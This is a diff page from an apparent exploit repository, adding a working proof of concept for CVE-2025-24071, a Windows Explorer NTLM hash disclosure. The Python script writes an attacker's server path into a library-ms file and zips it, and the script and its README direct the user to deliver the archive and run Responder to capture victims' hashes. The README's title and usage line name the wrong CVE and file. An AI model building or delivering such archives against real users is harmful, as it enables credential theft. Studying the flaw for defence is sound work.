0xvoodoo/PoCs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

merge into: 0xvoodoo/PoCs:reformat
Branches Tags
0xvoodoo/PoCs:main 0xvoodoo/PoCs:CVE-2026-31431 0xvoodoo/PoCs:CVE-2025-24071 0xvoodoo/PoCs:0xVoodoo-patch-1 0xvoodoo/PoCs:reformat
...
pull from: 0xvoodoo/PoCs:0xVoodoo-patch-1
Branches Tags
0xvoodoo/PoCs:main 0xvoodoo/PoCs:CVE-2026-31431 0xvoodoo/PoCs:CVE-2025-24071 0xvoodoo/PoCs:0xVoodoo-patch-1 0xvoodoo/PoCs:reformat

5 Commits
reformat ... 0xVoodoo-patch-1

Author SHA1 Message Date
0xVoodoo 12c4a9b097 Fix 24071 README 2025-08-19 12:40:23 -06:00
0xVoodoo 1f65c00ac5 Merge pull request #3 from 0xVoodoo/CVE-2025-24071 
Adding CVE-2025-24071 and tweaking READMEs
 2025-08-19 12:39:47 -06:00
0xVoodoo 78bdacd90d Adding CVE-2025-24071 and tweaking READMEs 2025-08-19 12:38:44 -06:00
0xVoodoo 81b198f31c Merge pull request #2 from 0xVoodoo/reformat 
Fixing links in the README
 2025-08-18 14:00:22 -06:00
0xVoodoo 07b56e0cdf Merge pull request #1 from 0xVoodoo/reformat 
Reformat the repo to store all my PoCs and add CVE-2025-24893
 2025-08-18 13:58:33 -06:00
5 changed files with 105 additions and 0 deletions
Expand all files Collapse all files
CVE-2023-23752/README.md
+2
View File
@@ -24,4 +24,6 @@ This is basically just a parser for the JSON returned by the open API endpoints,
# License # License
GPL v3.0 - as all good software should be GPL v3.0 - as all good software should be
Only with explicit permission from the target system owner.
Remember - don't be a skid :) Remember - don't be a skid :)
CVE-2025-24071/CVE-2025-24071.py
+71
View File
@@ -0,0 +1,71 @@
from os import rename
from os.path import isfile
from zipfile import ZipFile
import xml.etree.ElementTree as elementTree
import argparse
#pretty colors :)
RESET = "\033[0m"
RED = "\033[31m"
GREEN = "\033[32m"
YELLOW = "\033[33m"
BOLD = "\033[1m"
def findLib(library):
if not library.endswith(".library-ms"):
library = library + ".library-ms"
if isfile(library):
pass
else:
try:
rename("mal.library-ms", library)
except (OSError, PermissionError, IsADirectoryError) as error:
print(f"{BOLD}{RED}[-]{RESET} Error renaming library!")
raise SystemExit(error)
return library
def malLib(library, server):
contents = elementTree.parse(library)
root = contents.getroot()
nameSpace = root.tag.split("}")[0].strip("{")
elementTree.register_namespace('', nameSpace)
for element in root.iter():
if element.tag.endswith("url"):
element.text = "\\\\" + server + "\\shared"
contents.write(library, encoding="utf-8", xml_declaration=True)
def mkZip(library, filename):
if not filename.endswith(".zip"):
filename = filename + ".zip"
with ZipFile(filename, "w") as malZip:
malZip.write(library)
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog='CVE-2025-24071.py',
description='This is a PoC for CVE-2025-24071, a bug in Windows Explorer that allows for NTLM hash disclosure via crafted archives.',
epilog='PoC by 0xVoodoo - Don\'t be a skid :)' )
parser.add_argument('-s', '--server', required=True, help='Target IP/URL')
parser.add_argument('-f', '--file', required=True, help='Output file name')
parser.add_argument('-l', '--library', help='MS Library file name (default mal.library-ms)')
args = parser.parse_args()
print("===CVE-2025-24071 PoC by 0xVoodoo===")
if args.library:
library = findLib(args.library)
else:
library = "mal.library-ms"
print(f"{BOLD}{YELLOW}[*]{RESET} Modifying library")
malLib(library, args.server)
print(f"{BOLD}{YELLOW}[*]{RESET} Creating ZIP archive")
mkZip(library, args.file)
print(f"{BOLD}{GREEN}[+]{RESET} ZIP archive created:", args.file)
print(f"{BOLD}{YELLOW}[*]{RESET} Deliver the ZIP archive and start responder")
CVE-2025-24071/README.md
+20
View File
@@ -0,0 +1,20 @@
# CVE-2023-24071 - Windows Explorer NTLM Hash Disclosure
This exploit abuses the way Windows Explorer handles library files that have been extracted from an archive (.zip, .rar, etc.).
When an archive containing a library is decompressed, Explorer will automatically attempt a connection to the URL specified in the library.
This means that we can set up responder and listen for a connection back to our fake SMB server, disclosing the hash of the user who extracted the archive.
User interaction is required as the archive file must be opened for the connection to be made.
# Usage
CVE-2025-2401.py -s <attacker IP/domain> -f <output file name>
-l <library name> Renames the library file (default mal.library-ms)
# License
GPL v3.0 - as all good software should be
Only with explicit permission from the target system owner.
Remember - don't be a skid :)
CVE-2025-24071/mal.library-ms
+10
View File
@@ -0,0 +1,10 @@
<?xml version='1.0' encoding='utf-8'?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>example</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
CVE-2025-24893/README.md
+2
View File
@@ -8,4 +8,6 @@ The vulnerable endpoint here is:
# License # License
GPL v3.0 - as all good software should be GPL v3.0 - as all good software should be
Only with explicit permission from the target system owner.
Remember - don't be a skid :) Remember - don't be a skid :)